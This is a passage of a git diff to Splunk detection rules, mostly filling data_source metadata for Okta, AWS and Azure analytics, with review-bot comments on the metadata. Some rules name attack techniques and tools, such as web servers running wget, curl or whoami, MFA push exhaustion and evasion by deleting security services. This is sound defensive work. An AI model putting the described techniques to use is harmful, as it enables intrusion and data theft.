diff --git a/data_sources/windows_iis_29.yml b/data_sources/windows_iis_29.yml
new file mode 100644
index 0000000000..c2ae08d1c0
--- /dev/null
+++ b/data_sources/windows_iis_29.yml
@@ -0,0 +1,31 @@
+name: Windows IIS 29
+id: 1d99ddd7-7fec-4dea-bf4f-1f4906142328
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows IIS 29
+source: IIS:Configuration:Operational
+sourcetype: IIS:Configuration:Operational
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- ComputerName
+- EventCode
+- EventType
+- Keywords
+- LogName
+- Message
+- OpCode
+- RecordNumber
+- Sid
+- SidType
+- SourceName
+- TaskCategory
+- Type
+- User
+- name
+example_log: ''
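Review bot: `separator: EventID` names a field that does not appear in this object's `fields` list — the list carries `EventCode` — so whatever consumes `separator` to split events by id will not find it. Every other new object in this change uses `separator: EventCode`; use that here too unless the `IIS:Configuration:Operational` sourcetype really extracts `EventID`. `example_log: ''` is also empty, so the object cannot be replayed or validated; a real event 29 record from that channel should be added.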
diff --git a/detections/application/crushftp_server_side_template_injection.yml b/detections/application/crushftp_server_side_template_injection.yml
index 71c70e6b6c..6794bec15a 100644
--- a/detections/application/crushftp_server_side_template_injection.yml
+++ b/detections/application/crushftp_server_side_template_injection.yml
@@ -3,7 +3,8 @@ id: ccf6b7a3-bd39-4bc9-a949-143a8d640dbc
version: 1
date: '2024-05-16'
author: Michael Haag, Splunk
-data_source: []
+data_source:
+- CrushFTP
type: TTP
status: production
description: This analytic is designed to identify attempts to exploit a server-side template injection vulnerability in CrushFTP, designated as CVE-2024-4040. This severe vulnerability enables unauthenticated remote attackers to access and read files beyond the VFS Sandbox, circumvent authentication protocols, and execute arbitrary commands on the affected server. The issue impacts all versions of CrushFTP up to 10.7.1 and 11.1.0 on all supported platforms. It is highly recommended to apply patches immediately to prevent unauthorized access to the system and avoid potential data compromises. The search specifically looks for patterns in the raw log data that match the exploitation attempts, including READ or WRITE actions, and extracts relevant information such as the protocol, session ID, user, IP address, HTTP method, and the URI queried. It then evaluates these logs to confirm traces of exploitation based on the presence of specific keywords and the originating IP address, counting and sorting these events for further analysis.
diff --git a/detections/application/email_files_written_outside_of_the_outlook_directory.yml b/detections/application/email_files_written_outside_of_the_outlook_directory.yml
index 7360aadcfb..f37061e330 100644
--- a/detections/application/email_files_written_outside_of_the_outlook_directory.yml
+++ b/detections/application/email_files_written_outside_of_the_outlook_directory.yml
@@ -14,7 +14,7 @@ description: The following analytic detects email files (.pst or .ost) being cre
sensitive email content, leading to data breaches or further exploitation within
the network.
data_source:
-- Sysmon Event ID 11
+- Sysmon EventID 11
search: '| tstats `security_content_summariesonly` count values(Filesystem.file_path)
as file_path min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem
where (Filesystem.file_name=*.pst OR Filesystem.file_name=*.ost) Filesystem.file_path
diff --git a/detections/application/okta_authentication_failed_during_mfa_challenge.yml b/detections/application/okta_authentication_failed_during_mfa_challenge.yml
index 6ed2871746..489b0178cb 100644
--- a/detections/application/okta_authentication_failed_during_mfa_challenge.yml
+++ b/detections/application/okta_authentication_failed_during_mfa_challenge.yml
@@ -3,7 +3,8 @@ id: e2b99e7d-d956-411a-a120-2b14adfdde93
version: 2
date: '2024-05-29'
author: Bhavin Patel, Splunk
-data_source: []
+data_source:
+- Okta
type: TTP
status: production
description: The following analytic identifies failed authentication attempts during
diff --git a/detections/application/okta_idp_lifecycle_modifications.yml b/detections/application/okta_idp_lifecycle_modifications.yml
index c59a210bbb..a9052093c0 100644
--- a/detections/application/okta_idp_lifecycle_modifications.yml
+++ b/detections/application/okta_idp_lifecycle_modifications.yml
@@ -3,7 +3,8 @@ id: e0be2c83-5526-4219-a14f-c3db2e763d15
version: 2
date: '2024-05-28'
author: Bhavin Patel, Splunk
-data_source: []
+data_source:
+- Okta
type: Anomaly
status: production
description: The following analytic identifies modifications to Okta Identity Provider
diff --git a/detections/application/okta_mfa_exhaustion_hunt.yml b/detections/application/okta_mfa_exhaustion_hunt.yml
index 591a9b5231..e17f3aee26 100644
--- a/detections/application/okta_mfa_exhaustion_hunt.yml
+++ b/detections/application/okta_mfa_exhaustion_hunt.yml
@@ -12,7 +12,8 @@ description: The following analytic detects patterns of successful and failed Ok
may indicate an attacker attempting to bypass MFA by overwhelming the user with
push notifications. If confirmed malicious, this could lead to unauthorized access,
compromising the security of the affected accounts and potentially the entire environment.
-data_source: []
+data_source:
+- Okta
search: '`okta` eventType=system.push.send_factor_verify_push OR ((legacyEventType=core.user.factor.attempt_success)
AND (debugContext.debugData.factor=OKTA_VERIFY_PUSH)) OR ((legacyEventType=core.user.factor.attempt_fail)
AND (debugContext.debugData.factor=OKTA_VERIFY_PUSH)) | stats count(eval(legacyEventType="core.user.factor.attempt_success")) as
diff --git a/detections/application/okta_mismatch_between_source_and_response_for_verify_push_request.yml b/detections/application/okta_mismatch_between_source_and_response_for_verify_push_request.yml
index 41b874c8bc..03a6a1aa0e 100644
--- a/detections/application/okta_mismatch_between_source_and_response_for_verify_push_request.yml
+++ b/detections/application/okta_mismatch_between_source_and_response_for_verify_push_request.yml
@@ -5,7 +5,8 @@ date: '2024-05-19'
author: John Murphy and Jordan Ruocco, Okta, Michael Haag, Splunk
type: TTP
status: experimental
-data_source: []
+data_source:
+- Okta
description: 'The following analytic identifies discrepancies between the source and
response events for Okta Verify Push requests, indicating potential suspicious behavior.
It leverages Okta System Log events, specifically `system.push.send_factor_verify_push`
diff --git a/detections/application/okta_multi_factor_authentication_disabled.yml b/detections/application/okta_multi_factor_authentication_disabled.yml
index 4f3d2badc0..478f4dbbac 100644
--- a/detections/application/okta_multi_factor_authentication_disabled.yml
+++ b/detections/application/okta_multi_factor_authentication_disabled.yml
@@ -3,7 +3,8 @@ id: 7c0348ce-bdf9-45f6-8a57-c18b5976f00a
version: 2
date: '2024-05-13'
author: Mauricio Velazco, Splunk
-data_source: []
+data_source:
+- Okta
type: TTP
status: production
description: The following analytic identifies an attempt to disable multi-factor
diff --git a/detections/application/okta_multiple_accounts_locked_out.yml b/detections/application/okta_multiple_accounts_locked_out.yml
index 7771f9cfa8..daf67758d4 100644
--- a/detections/application/okta_multiple_accounts_locked_out.yml
+++ b/detections/application/okta_multiple_accounts_locked_out.yml
@@ -3,7 +3,8 @@ id: a511426e-184f-4de6-8711-cfd2af29d1e1
version: 2
date: '2024-05-11'
author: Michael Haag, Mauricio Velazco, Splunk
-data_source: []
+data_source:
+- Okta
type: Anomaly
status: production
description: The following analytic detects multiple Okta accounts being locked out
diff --git a/detections/application/okta_multiple_failed_mfa_requests_for_user.yml b/detections/application/okta_multiple_failed_mfa_requests_for_user.yml
index d0a539de30..bf761654d3 100644
--- a/detections/application/okta_multiple_failed_mfa_requests_for_user.yml
+++ b/detections/application/okta_multiple_failed_mfa_requests_for_user.yml
@@ -3,7 +3,8 @@ id: 826dbaae-a1e6-4c8c-b384-d16898956e73
version: 2
date: '2024-05-20'
author: Mauricio Velazco, Splunk
-data_source: []
+data_source:
+- Okta
type: Anomaly
status: production
description: The following analytic identifies multiple failed multi-factor authentication
diff --git a/detections/application/okta_multiple_failed_requests_to_access_applications.yml b/detections/application/okta_multiple_failed_requests_to_access_applications.yml
index 56a07ee4db..2211b8fb5d 100644
--- a/detections/application/okta_multiple_failed_requests_to_access_applications.yml
+++ b/detections/application/okta_multiple_failed_requests_to_access_applications.yml
@@ -5,7 +5,8 @@ date: "2024-05-30"
author: John Murphy, Okta, Michael Haag, Splunk
type: Hunting
status: experimental
-data_source: []
+data_source:
+- Okta
description: 'The following analytic detects multiple failed attempts to access applications
in Okta, potentially indicating the reuse of a stolen web session cookie. It leverages
Okta logs to evaluate policy and SSO events, aggregating data by user, session,
diff --git a/detections/application/okta_multiple_users_failing_to_authenticate_from_ip.yml b/detections/application/okta_multiple_users_failing_to_authenticate_from_ip.yml
index 6c457c5bd9..4f1af7ca0b 100644
--- a/detections/application/okta_multiple_users_failing_to_authenticate_from_ip.yml
+++ b/detections/application/okta_multiple_users_failing_to_authenticate_from_ip.yml
@@ -3,7 +3,8 @@ id: de365ffa-42f5-46b5-b43f-fa72290b8218
version: 2
date: '2024-05-28'
author: Michael Haag, Mauricio Velazco, Splunk
-data_source: []
+data_source:
+- Okta
type: Anomaly
status: production
description: The following analytic identifies instances where more than 10 unique
diff --git a/detections/application/okta_new_api_token_created.yml b/detections/application/okta_new_api_token_created.yml
index 9d6a299dd2..4c4200cccb 100644
--- a/detections/application/okta_new_api_token_created.yml
+++ b/detections/application/okta_new_api_token_created.yml
@@ -13,7 +13,8 @@ description: The following analytic detects the creation of a new API token with
persistence. If confirmed malicious, this could enable attackers to execute API
calls, access sensitive data, and perform administrative actions within the Okta
environment.
-data_source: []
+data_source:
+- Okta
search: ' | tstats `security_content_summariesonly` count max(_time) as lastTime,
min(_time) as firstTime from datamodel=Change where All_Changes.action=created AND
All_Changes.command=system.api_token.create by _time span=5m All_Changes.user All_Changes.result
diff --git a/detections/application/okta_new_device_enrolled_on_account.yml b/detections/application/okta_new_device_enrolled_on_account.yml
index 8d19286783..76288f15e1 100644
--- a/detections/application/okta_new_device_enrolled_on_account.yml
+++ b/detections/application/okta_new_device_enrolled_on_account.yml
@@ -13,7 +13,8 @@ description: The following analytic identifies when a new device is enrolled on
to potential account takeover, unauthorized access, and persistent control over
the compromised Okta account. Monitoring this behavior is crucial for detecting
and mitigating unauthorized access attempts.
-data_source: []
+data_source:
+- Okta
search: ' | tstats `security_content_summariesonly` count max(_time) as lastTime,
min(_time) as firstTime from datamodel=Change where All_Changes.action=created All_Changes.command=device.enrollment.create
by _time span=5m All_Changes.user All_Changes.result All_Changes.command sourcetype
diff --git a/detections/application/okta_phishing_detection_with_fastpass_origin_check.yml b/detections/application/okta_phishing_detection_with_fastpass_origin_check.yml
index ee78e21364..8fad808cf6 100644
--- a/detections/application/okta_phishing_detection_with_fastpass_origin_check.yml
+++ b/detections/application/okta_phishing_detection_with_fastpass_origin_check.yml
@@ -5,7 +5,8 @@ date: '2024-05-15'
author: Okta, Inc, Michael Haag, Splunk
type: TTP
status: experimental
-data_source: []
+data_source:
+- Okta
description: The following analytic identifies failed user authentication attempts
in Okta due to FastPass declining a phishing attempt. It leverages Okta logs, specifically
looking for events where multi-factor authentication (MFA) fails with the reason
diff --git a/detections/application/okta_risk_threshold_exceeded.yml b/detections/application/okta_risk_threshold_exceeded.yml
index 314de0f5d4..8a6cb4a408 100644
--- a/detections/application/okta_risk_threshold_exceeded.yml
+++ b/detections/application/okta_risk_threshold_exceeded.yml
@@ -13,7 +13,8 @@ description: The following correlation identifies when a user exceeds a risk thr
tactics, techniques, and procedures (TTPs) within a 24-hour period. If confirmed
malicious, this activity could indicate a serious security breach, allowing attackers
to gain unauthorized access, escalate privileges, or persist within the environment.
-data_source: []
+data_source:
+- Okta
search: '| tstats `security_content_summariesonly` values(All_Risk.analyticstories)
as analyticstories sum(All_Risk.calculated_risk_score) as risk_score, count(All_Risk.calculated_risk_score)
as risk_event_count,values(All_Risk.annotations.mitre_attack.mitre_tactic_id) as
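Review bot: `- Okta` does not describe what this search reads: it queries `datamodel=Risk` (All_Risk), i.e. risk events emitted by other analytics, not Okta log events. A unit test that replays raw Okta logs will not populate the Risk data model unless the upstream detections also run, so the tag can mislead both test selection and anyone mapping sources to detections. If the repository has no data source object for risk events, keeping `- Okta` is understandable, but the description should then say so, e.g. `This correlation consumes risk events produced by other Okta detections rather than raw Okta logs.`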
diff --git a/detections/application/okta_successful_single_factor_authentication.yml b/detections/application/okta_successful_single_factor_authentication.yml
index 02d48dae21..85bf673cbe 100644
--- a/detections/application/okta_successful_single_factor_authentication.yml
+++ b/detections/application/okta_successful_single_factor_authentication.yml
@@ -3,7 +3,8 @@ id: 98f6ad4f-4325-4096-9d69-45dc8e638e82
version: 2
date: '2024-05-26'
author: Bhavin Patel, Splunk
-data_source: []
+data_source:
+- Okta
type: Anomaly
status: production
description: The following analytic identifies successful single-factor authentication
diff --git a/detections/application/okta_suspicious_activity_reported.yml b/detections/application/okta_suspicious_activity_reported.yml
index 66a5b84607..447b104ac5 100644
--- a/detections/application/okta_suspicious_activity_reported.yml
+++ b/detections/application/okta_suspicious_activity_reported.yml
@@ -13,7 +13,8 @@ description: The following analytic identifies when an associate reports a login
malicious, the attacker could gain unauthorized access to sensitive systems and
data, leading to data theft, privilege escalation, or further compromise of the
environment.
-data_source: []
+data_source:
+- Okta
search: '`okta` eventType=user.account.report_suspicious_activity_by_enduser | stats
count min(_time) as firstTime max(_time) as lastTime values(displayMessage) by user
eventType client.userAgent.rawUserAgent client.userAgent.browser client.geographicalContext.city client.geographicalContext.country
diff --git a/detections/application/okta_suspicious_use_of_a_session_cookie.yml b/detections/application/okta_suspicious_use_of_a_session_cookie.yml
index 9e144bfc6e..769fd797ab 100644
--- a/detections/application/okta_suspicious_use_of_a_session_cookie.yml
+++ b/detections/application/okta_suspicious_use_of_a_session_cookie.yml
@@ -5,7 +5,8 @@ date: '2024-05-29'
author: Scott Dermott, Felicity Robson, Okta, Michael Haag, Bhavin Patel, Splunk
type: Anomaly
status: production
-data_source: []
+data_source:
+- Okta
description: 'The following analytic identifies suspicious use of a session cookie
by detecting multiple client values (IP, User Agent, etc.) changing for the same
Device Token associated with a specific user. It leverages policy evaluation events
diff --git a/detections/application/okta_threatinsight_threat_detected.yml b/detections/application/okta_threatinsight_threat_detected.yml
index 77a959649f..510f83e8df 100644
--- a/detections/application/okta_threatinsight_threat_detected.yml
+++ b/detections/application/okta_threatinsight_threat_detected.yml
@@ -12,7 +12,8 @@ description: The following analytic identifies threats detected by Okta ThreatIn
access attempts and credential-based attacks. If confirmed malicious, these activities
could lead to unauthorized access, data breaches, and further exploitation of compromised
accounts, posing a significant risk to the organization's security posture.
-data_source: []
+data_source:
+- Okta
search: '`okta` eventType = security.threat.detected | rename client.geographicalContext.country
as country, client.geographicalContext.state as state, client.geographicalContext.city
as city | stats count min(_time) as firstTime max(_time) as lastTime by app src_ip
diff --git a/detections/application/okta_unauthorized_access_to_application.yml b/detections/application/okta_unauthorized_access_to_application.yml
index 9f94ca1140..e7a0ad8897 100644
--- a/detections/application/okta_unauthorized_access_to_application.yml
+++ b/detections/application/okta_unauthorized_access_to_application.yml
@@ -3,7 +3,8 @@ id: 5f661629-9750-4cb9-897c-1f05d6db8727
version: 2
date: '2024-05-12'
author: 'Bhavin Patel, Splunk'
-data_source: []
+data_source:
+- Okta
type: Anomaly
status: production
description: The following analytic identifies attempts by users to access Okta applications
diff --git a/detections/application/okta_user_logins_from_multiple_cities.yml b/detections/application/okta_user_logins_from_multiple_cities.yml
index adefdd2cae..9834d29bd2 100644
--- a/detections/application/okta_user_logins_from_multiple_cities.yml
+++ b/detections/application/okta_user_logins_from_multiple_cities.yml
@@ -3,7 +3,8 @@ id: a3d1df37-c2a9-41d0-aa8f-59f82d6192a8
version: 2
date: '2024-05-09'
author: 'Bhavin Patel, Splunk'
-data_source: []
+data_source:
+- Okta
type: Anomaly
status: production
description: The following analytic identifies instances where the same Okta user
diff --git a/detections/application/web_servers_executing_suspicious_processes.yml b/detections/application/web_servers_executing_suspicious_processes.yml
index f9cd51422a..86b21aef43 100644
--- a/detections/application/web_servers_executing_suspicious_processes.yml
+++ b/detections/application/web_servers_executing_suspicious_processes.yml
@@ -8,7 +8,7 @@ type: TTP
description: |-
The following analytic detects the execution of suspicious processes on systems identified as web servers. It leverages the Splunk data model "Endpoint.Processes" to search for specific process names such as "whoami", "ping", "iptables", "wget", "service", and "curl". This activity is significant because these processes are often used by attackers for reconnaissance, persistence, or data exfiltration. If confirmed malicious, this could lead to data theft, deployment of additional malware, or even ransomware attacks. Immediate investigation is required to determine the legitimacy of the activity and mitigate potential threats.
data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.dest_category="web_server"
AND (Processes.process="*whoami*" OR Processes.process="*ping*" OR Processes.process="*iptables*"
diff --git a/detections/cloud/abnormally_high_number_of_cloud_infrastructure_api_calls.yml b/detections/cloud/abnormally_high_number_of_cloud_infrastructure_api_calls.yml
index 343122859f..23aa020d39 100644
--- a/detections/cloud/abnormally_high_number_of_cloud_infrastructure_api_calls.yml
+++ b/detections/cloud/abnormally_high_number_of_cloud_infrastructure_api_calls.yml
@@ -13,7 +13,8 @@ description: The following analytic detects a spike in the number of API calls m
confirmed malicious, this could lead to unauthorized access, data exfiltration,
or disruption of cloud services, posing a significant risk to the organization's
cloud environment.
-data_source: []
+data_source:
+- AWS CloudTrail
search: '| tstats count as api_calls values(All_Changes.command) as command from datamodel=Change
where All_Changes.user!=unknown All_Changes.status=success by All_Changes.user _time
span=1h | `drop_dm_object_name("All_Changes")` | eval HourOfDay=strftime(_time,
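Review bot: `- AWS CloudTrail` narrows the declared source to one provider, while the search reads the vendor-agnostic Change data model and the name and description speak of cloud infrastructure generally. If the data_source list drives test selection or TA mapping in contentctl, any non-AWS audit source that also populates Change is now undeclared here; the same applies to the other datamodel=Change detections in this diff (abnormally_high_number_of_cloud_instances_*, cloud_compute_instance_created_*). Either add the other cloud audit data sources registered under data_sources/ that feed this model, or state the AWS-only scope in the description so the narrowing is deliberate rather than an artifact of filling an empty list.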
diff --git a/detections/cloud/abnormally_high_number_of_cloud_instances_destroyed.yml b/detections/cloud/abnormally_high_number_of_cloud_instances_destroyed.yml
index aea878fa80..a7e7e2e048 100644
--- a/detections/cloud/abnormally_high_number_of_cloud_instances_destroyed.yml
+++ b/detections/cloud/abnormally_high_number_of_cloud_instances_destroyed.yml
@@ -13,7 +13,8 @@ description: The following analytic identifies an abnormally high number of clou
to disrupt services. If confirmed malicious, this could lead to significant operational
disruptions, data loss, and potential financial impact due to the destruction of
critical cloud resources.
-data_source: []
+data_source:
+- AWS CloudTrail
search: '| tstats count as instances_destroyed values(All_Changes.object_id) as object_id
from datamodel=Change where All_Changes.action=deleted AND All_Changes.status=success
AND All_Changes.object_category=instance by All_Changes.user _time span=1h | `drop_dm_object_name("All_Changes")`
diff --git a/detections/cloud/abnormally_high_number_of_cloud_instances_launched.yml b/detections/cloud/abnormally_high_number_of_cloud_instances_launched.yml
index 21ab397c4f..5dde904f38 100644
--- a/detections/cloud/abnormally_high_number_of_cloud_instances_launched.yml
+++ b/detections/cloud/abnormally_high_number_of_cloud_instances_launched.yml
@@ -12,7 +12,8 @@ description: The following analytic detects an abnormally high number of cloud i
indicate unauthorized access or misuse of cloud resources. If confirmed malicious,
this behavior could lead to resource exhaustion, increased costs, or provide attackers
with additional compute resources to further their objectives.
-data_source: []
+data_source:
+- AWS CloudTrail
search: '| tstats count as instances_launched values(All_Changes.object_id) as object_id
from datamodel=Change where (All_Changes.action=created) AND All_Changes.status=success
AND All_Changes.object_category=instance by All_Changes.user _time span=1h | `drop_dm_object_name("All_Changes")`
diff --git a/detections/cloud/aws_createloginprofile.yml b/detections/cloud/aws_createloginprofile.yml
index ab82917ec6..d63313a420 100644
--- a/detections/cloud/aws_createloginprofile.yml
+++ b/detections/cloud/aws_createloginprofile.yml
@@ -13,8 +13,7 @@ description: The following analytic identifies the creation of a login profile f
to gain unauthorized access. If confirmed malicious, this could allow the attacker
to escalate privileges and maintain persistent access to the AWS environment.
data_source:
-- AWS CloudTrail CreateLoginProfile
-- AWS CloudTrail ConsoleLogin
+- AWS CloudTrail CreateLoginProfile AND AWS CloudTrail ConsoleLogin
search: '`cloudtrail` eventName = CreateLoginProfile | rename requestParameters.userName
as new_login_profile | table src_ip eventName new_login_profile userIdentity.userName |
join new_login_profile src_ip [| search `cloudtrail` eventName = ConsoleLogin |
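Review bot: The new single entry `- AWS CloudTrail CreateLoginProfile AND AWS CloudTrail ConsoleLogin` folds two sources into one string, breaking the one-source-per-item convention every other data_source list in this change keeps (the DeleteLogStream/DeleteDetector list, CreateKey/PutKeyPolicy). If contentctl 4.2.0 resolves each entry against a registered data source name, as the renames elsewhere in this diff suggest, the combined string will match nothing and the detection loses both mappings. Keep the two entries `- AWS CloudTrail CreateLoginProfile` and `- AWS CloudTrail ConsoleLogin`; the search already expresses the conjunction through its join, so the metadata does not need to.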
diff --git a/detections/cloud/aws_cross_account_activity_from_previously_unseen_account.yml b/detections/cloud/aws_cross_account_activity_from_previously_unseen_account.yml
index ec8448813e..9e71e4ecdd 100644
--- a/detections/cloud/aws_cross_account_activity_from_previously_unseen_account.yml
+++ b/detections/cloud/aws_cross_account_activity_from_previously_unseen_account.yml
@@ -13,7 +13,8 @@ description: The following analytic identifies AssumeRole events where an IAM ro
escalation attempts. If confirmed malicious, an attacker could gain unauthorized
access to resources in another account, potentially leading to data exfiltration,
service disruption, or further compromise of the AWS environment.
-data_source: []
+data_source:
+- AWS CloudTrail
search: '| tstats min(_time) as firstTime max(_time) as lastTime from datamodel=Authentication
where Authentication.signature=AssumeRole by Authentication.vendor_account Authentication.user
Authentication.src Authentication.user_role | `drop_dm_object_name(Authentication)`
diff --git a/detections/cloud/aws_defense_evasion_impair_security_services.yml b/detections/cloud/aws_defense_evasion_impair_security_services.yml
index a9a0b4337e..df7ea110b8 100644
--- a/detections/cloud/aws_defense_evasion_impair_security_services.yml
+++ b/detections/cloud/aws_defense_evasion_impair_security_services.yml
@@ -14,13 +14,13 @@ description: The following analytic detects attempts to delete critical AWS secu
escalate privileges, or exfiltrate data without triggering security alerts, severely
compromising the security posture of the AWS environment.
data_source:
-- AWS CloudTrail DeleteLogStream
-- AWS CloudTrail DeleteDetector
-- AWS CloudTrail DeleteIPSet
-- AWS CloudTrail DeleteWebACL
-- AWS CloudTrail DeleteRule
-- AWS CloudTrail DeleteRuleGroup
-- AWS CloudTrail DeleteLoggingConfiguration
+- AWS CloudTrail DeleteLogStream
+- AWS CloudTrail DeleteDetector
+- AWS CloudTrail DeleteIPSet
+- AWS CloudTrail DeleteWebACL
+- AWS CloudTrail DeleteRule
+- AWS CloudTrail DeleteRuleGroup
+- AWS CloudTrail DeleteLoggingConfiguration
- AWS CloudTrail DeleteAlarms
search: '`cloudtrail` eventName IN ("DeleteLogStream","DeleteDetector","DeleteIPSet","DeleteWebACL","DeleteRule","DeleteRuleGroup","DeleteLoggingConfiguration","DeleteAlarms")
| stats count min(_time) as firstTime max(_time) as lastTime values(eventName) as
diff --git a/detections/cloud/aws_detect_users_creating_keys_with_encrypt_policy_without_mfa.yml b/detections/cloud/aws_detect_users_creating_keys_with_encrypt_policy_without_mfa.yml
index 3546a2c397..ffdd1b1caa 100644
--- a/detections/cloud/aws_detect_users_creating_keys_with_encrypt_policy_without_mfa.yml
+++ b/detections/cloud/aws_detect_users_creating_keys_with_encrypt_policy_without_mfa.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the creation of AWS KMS keys with an
encryption, potentially disrupting operations and compromising sensitive information
across multiple entities.
data_source:
-- AWS CloudTrail CreateKey
+- AWS CloudTrail CreateKey
- AWS CloudTrail PutKeyPolicy
search: '`cloudtrail` eventName=CreateKey OR eventName=PutKeyPolicy | spath input=requestParameters.policy
output=key_policy_statements path=Statement{} | mvexpand key_policy_statements |
diff --git a/detections/cloud/aws_detect_users_with_kms_keys_performing_encryption_s3.yml b/detections/cloud/aws_detect_users_with_kms_keys_performing_encryption_s3.yml
index 449c60efe9..75dbada08b 100644
--- a/detections/cloud/aws_detect_users_with_kms_keys_performing_encryption_s3.yml
+++ b/detections/cloud/aws_detect_users_with_kms_keys_performing_encryption_s3.yml
@@ -12,7 +12,8 @@ description: The following analytic identifies users with KMS keys performing en
exfiltration or tampering efforts. If confirmed malicious, an attacker could be
encrypting sensitive data to evade detection or preparing it for exfiltration, posing
a significant risk to data integrity and confidentiality.
-data_source: []
+data_source:
+- AWS CloudTrail
search: '`cloudtrail` eventName=CopyObject requestParameters.x-amz-server-side-encryption="aws:kms"
| rename requestParameters.bucketName AS bucketName, requestParameters.x-amz-copy-source
AS src_file, requestParameters.key AS dest_file | stats count min(_time) as firstTime
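Review bot: `- AWS CloudTrail` is coarser than the naming this diff uses for other CloudTrail-backed detections, where each entry names the event (`AWS CloudTrail CreateKey`, `AWS CloudTrail PutKeyPolicy`). This search filters on a single `eventName=CopyObject`, so the per-event form `- AWS CloudTrail CopyObject` would follow that convention, provided a data source of that name exists under data_sources/. If it does not, the generic entry is acceptable, but the mixed granularity is worth a short note so later contributors do not "fix" it in either direction.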
diff --git a/detections/cloud/aws_exfiltration_via_ec2_snapshot.yml b/detections/cloud/aws_exfiltration_via_ec2_snapshot.yml
index 11f1b6109f..376e9183dd 100644
--- a/detections/cloud/aws_exfiltration_via_ec2_snapshot.yml
+++ b/detections/cloud/aws_exfiltration_via_ec2_snapshot.yml
@@ -6,9 +6,9 @@ author: Bhavin Patel, Splunk
status: production
type: TTP
data_source:
-- AWS CloudTrail CreateSnapshot
-- AWS CloudTrail DescribeSnapshotAttribute
-- AWS CloudTrail ModifySnapshotAttribute
+- AWS CloudTrail CreateSnapshot
+- AWS CloudTrail DescribeSnapshotAttribute
+- AWS CloudTrail ModifySnapshotAttribute
- AWS CloudTrail DeleteSnapshot
description: The following analytic detects a series of AWS API calls related to EC2
snapshots within a short time window, indicating potential exfiltration via EC2
diff --git a/detections/cloud/aws_multi_factor_authentication_disabled.yml b/detections/cloud/aws_multi_factor_authentication_disabled.yml
index fdd8ede3df..ca298fb049 100644
--- a/detections/cloud/aws_multi_factor_authentication_disabled.yml
+++ b/detections/cloud/aws_multi_factor_authentication_disabled.yml
@@ -13,7 +13,7 @@ description: The following analytic detects attempts to disable multi-factor aut
action could allow attackers to retain access to the AWS environment without detection,
posing a significant risk to the security and integrity of the cloud infrastructure.
data_source:
-- AWS CloudTrail DeleteVirtualMFADevice
+- AWS CloudTrail DeleteVirtualMFADevice
- AWS CloudTrail DeactivateMFADevice
search: '`cloudtrail` (eventName= DeleteVirtualMFADevice OR eventName=DeactivateMFADevice)
| stats count min(_time) as firstTime max(_time) as lastTime by src eventName eventSource
diff --git a/detections/cloud/aws_network_access_control_list_created_with_all_open_ports.yml b/detections/cloud/aws_network_access_control_list_created_with_all_open_ports.yml
index 185dc52314..9ff1aab050 100644
--- a/detections/cloud/aws_network_access_control_list_created_with_all_open_ports.yml
+++ b/detections/cloud/aws_network_access_control_list_created_with_all_open_ports.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the creation of AWS Network Access C
this misconfiguration to gain unrestricted access to the network, potentially leading
to data exfiltration, service disruption, or further compromise of the AWS environment.
data_source:
-- AWS CloudTrail CreateNetworkAclEntry
+- AWS CloudTrail CreateNetworkAclEntry
- AWS CloudTrail ReplaceNetworkAclEntry
search: '`cloudtrail` eventName=CreateNetworkAclEntry OR eventName=ReplaceNetworkAclEntry
requestParameters.ruleAction=allow requestParameters.egress=false requestParameters.aclProtocol=-1
diff --git a/detections/cloud/aws_password_policy_changes.yml b/detections/cloud/aws_password_policy_changes.yml
index af1c3de763..913ce9b858 100644
--- a/detections/cloud/aws_password_policy_changes.yml
+++ b/detections/cloud/aws_password_policy_changes.yml
@@ -14,8 +14,8 @@ description: The following analytic detects successful API calls to view, update
could lead to compromised accounts and increased attack surface, potentially allowing
unauthorized access and control over AWS resources.
data_source:
-- AWS CloudTrail UpdateAccountPasswordPolicy
-- AWS CloudTrail GetAccountPasswordPolicy
+- AWS CloudTrail UpdateAccountPasswordPolicy
+- AWS CloudTrail GetAccountPasswordPolicy
- AWS CloudTrail DeleteAccountPasswordPolicy
search: '`cloudtrail` eventName IN ("UpdateAccountPasswordPolicy","GetAccountPasswordPolicy","DeleteAccountPasswordPolicy")
errorCode=success | stats count values(eventName) as eventName values(userAgent)
diff --git a/detections/cloud/azure_ad_user_enabled_and_password_reset.yml b/detections/cloud/azure_ad_user_enabled_and_password_reset.yml
index d5914a8161..6827fe05be 100644
--- a/detections/cloud/azure_ad_user_enabled_and_password_reset.yml
+++ b/detections/cloud/azure_ad_user_enabled_and_password_reset.yml
@@ -13,8 +13,8 @@ description: The following analytic detects an Azure AD user enabling a previous
allow the attacker to maintain persistent access, escalate privileges, and potentially
exfiltrate sensitive information from the environment.
data_source:
-- Azure Active Directory Enable account
-- Azure Active Directory Reset password (by admin)
+- Azure Active Directory Enable account
+- Azure Active Directory Reset password (by admin)
- Azure Active Directory Update user
search: ' `azure_monitor_aad` (operationName="Enable account" OR operationName="Reset
password (by admin)" OR operationName="Update user") | transaction user startsWith=(operationName="Enable
diff --git a/detections/cloud/cloud_api_calls_from_previously_unseen_user_roles.yml b/detections/cloud/cloud_api_calls_from_previously_unseen_user_roles.yml
index ca2e5983db..f34a186296 100644
--- a/detections/cloud/cloud_api_calls_from_previously_unseen_user_roles.yml
+++ b/detections/cloud/cloud_api_calls_from_previously_unseen_user_roles.yml
@@ -7,7 +7,8 @@ status: experimental
type: Anomaly
description: |-
The following analytic detects cloud API calls executed by user roles that have not previously run these commands. It leverages the Change data model in Splunk to identify commands executed by users with the user_type of AssumedRole and a status of success. This activity is significant because new commands from different user roles can indicate potential malicious activity or unauthorized actions. If confirmed malicious, this behavior could lead to unauthorized access, data breaches, or other damaging outcomes by exploiting new or unmonitored commands within the cloud environment.
-data_source: []
+data_source:
+- AWS CloudTrail
search: '| tstats earliest(_time) as firstTime, latest(_time) as lastTime from datamodel=Change
where All_Changes.user_type=AssumedRole AND All_Changes.status=success by All_Changes.user,
All_Changes.command All_Changes.object | `drop_dm_object_name("All_Changes")` |
diff --git a/detections/cloud/cloud_compute_instance_created_by_previously_unseen_user.yml b/detections/cloud/cloud_compute_instance_created_by_previously_unseen_user.yml
